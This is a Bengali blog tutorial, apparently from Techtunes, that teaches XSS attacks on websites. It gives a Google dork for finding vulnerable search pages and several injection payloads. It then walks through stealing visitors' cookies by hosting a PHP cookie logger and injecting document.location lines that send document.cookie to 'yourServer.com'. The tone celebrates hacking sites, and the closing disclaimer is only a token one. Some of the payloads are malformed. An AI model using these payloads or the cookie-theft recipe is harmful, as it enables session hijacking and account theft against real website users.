আজকের পর্বের বিষয়ঃ-
প্রথম পর্ব যারা দেখেন নি দেখে আসুনঃ-
XSS কি? XSS একটি সংক্ষিপ্ত শব্দ, এর পূর্ণরূপ হল Cross Site Scripting. এটি application-layer web attacks এর সবচেয়ে জনপ্রিয় একটি ম্যাথড। সাধারণত বিভিন্ন বড় বড় সাইট হ্যাকিং করতে এই ম্যাথডটি সবচেয়ে বেশি ব্যবহৃত হয়। একটি ওয়েবসাইটের নিরাপত্তা ভাঙ্গার এটিই হল সবচেয়ে ভাল পদ্ধতি। 😈
XSS attack দিয়ে একজন হ্যাকার তার ভিকটিমের ক্লায়েন্ট সাইড স্ক্রিপ্টের আসল ওয়েব পেজ সংক্রমিত করে। যখন একজন ভিজিটর আপনার ওয়েবসাইট ভিজিট করে, তখন script টি স্বয়ংক্রিয়ভাবে ভিজিটরের ব্রাউজারে ডাউনলোড হয়।
XSS Vulnerabilities খুঁজে বের করাঃ-একটি ওয়েবসাইটের vulnerabilities খুঁজে বের করার জন্য আপনি সহযোগিতা নিতে পারেন Blogs, Forums, Shoutboxes, Comment Boxes, Search Box’s ও অন্যান্য যে কোন কিছুর। এছাড়াও আপনি Google Dorks দিয়েও আপনি ওয়েবসাইটের ভ্যলু বের করে নিতে পারেন। আর যদি আপনি carking করতে না পারেন, তাহলে গুগলে যান ও নিচের ডকটি লিখে এন্টার করুন।
inurl:"search.php?q=" তাহলে আপনি অনেক গুলো ফলাফল পেয়ে যাবেন। 😯
XSS প্রাথমিক আলোচনাঃ- XSS এর বেসিক জিনিসগুলো জানতে প্রথমে একটি ছবি দেখতে হবে।
Xss injection এ সবচেয়ে বেশি যে কোডটি ব্যবহৃত হয়, সেটা হল <script>alert("XSS")</script>
এতক্ষন দেখলাম XSS এর কাজ করার পদ্ধতি। এখন এর কয়েকটি জনপ্রিয় ম্যাথড দেখব ! 😛
<html><body><IMG SRC="http://site.com/hacked.cyberking"></body></html> এছাড়াও আপনি আরেকটি কাজ করতে পারবেন IMG SCR এটা হল তাদের জন্য যারা HTML জানেন না তাদের জন্য। IMG SCR হল একটি ট্যাগ, এখানে দেয়া ছবিটি লিংক ওয়েবপেজে দেখাবে। এখন আমরা Shoutbox, Comment box বা যে কোন কিছু খুঁজে পেলাম। যা আপনার সাবমিট করাডাটাটি ওয়েবপেইজে দেখাবে। তবে এটা করলে আপনার ওয়েবপেজে শুধু মাত্র ছবির লিংকটি দেখাবে। <IMG SRC=""http://site.com/vuthBaba.png">তবে এটা করলে আপনার দেয়া ছবিটি ওয়েবপেজে বড় দেখাবে। এছাড়া আরেকটি ম্যাথড হল FLASH ভিডিও। <EMBED SRC="http://site.com/TJUnselected.swf"এবার একটি পপ-আপ দিন <script>window.open("http://www.site")</script>।
প্রথমে আপনাকে একটি cookie stealer নিতে হবে। এর জন্য এখানে যান। এবার এটি কে সেভ করুন। আপনি একটি .php ফাইল খুঁজে পাবেন। এটি একটি ওয়েব সার্ভারে আপলোড করুন। এবং মনে রাখবেন অবশ্যই ‘log.txt’ নামে একটি ফাইল তৈরি করবেন ও একে 777 এ chmod করুন।। নোটঃ chmod হল একটি Unix command যা আপনাকে একটি সিস্টেমের প্রবেশাধিকার সম্পর্কে জানাবে। এবার একটি XSS vulnerable website খুঁজে বের করুন। পাওয়া গেলে আপনি এখন আপনার কোডটি প্রবেশ করাবেন। window.location = "http://yourServer.com/cookielogger.php?c="+document.cookie
অথবা
document.location = "http://yourServer.com/cookielogger.php?c="+document.cookieএবার যখনই ভিজিটর রা আপনার সাইটটি ভিজিট করবে তখনই এটি তাদের কুকিগুলো চুরি করে রেখে দিবে। এখন আমরা কুকি নিয়ে নিব।http://site.com/search.php?q=document.location = “http://yourServer.com/cookielogger.phpc=”+document.cookie 👿
আরো কিছু থাকলে মন্তভ্য এর মাধ্যমে জানবেন। ক্রেডিট ➡ Click Here 💡
উপদেশঃ- হ্যাকিং জানার জন্য শিখে রাখুন। কার ক্ষতি করার জন্য নয়। হ্যা কোথায় কিছু অন্যায় ভাবে করলে সমস্যা হলে লেখক দায়ী নয়। নিজ দ্বায়িতে করুন। 👿
যোগাযোগ করুনঃ- ভুত বাবা (রিকুয়েস্ট দিলে মেসেজ দিবেন নাইলে এক্সপেট হবার ভরসা নাই)
আমি আমি একজন ভাল ছেলে। বিশ্বের সর্ববৃহৎ বিজ্ঞান ও প্রযুক্তির সৌশল নেটওয়ার্ক - টেকটিউনস এ আমি 9 বছর 6 মাস যাবৎ যুক্ত আছি। টেকটিউনস আমি এ পর্যন্ত 18 টি টিউন ও 30 টি টিউমেন্ট করেছি। টেকটিউনসে আমার 0 ফলোয়ার আছে এবং আমি টেকটিউনসে 0 টিউনারকে ফলো করি।
কিছু নাই
Thank’s vai. vai tune ear sathe bangla video dele r o valo hobe.pls.pls.pls . r k o na hole o apna tune thake ami 1 jon siktece.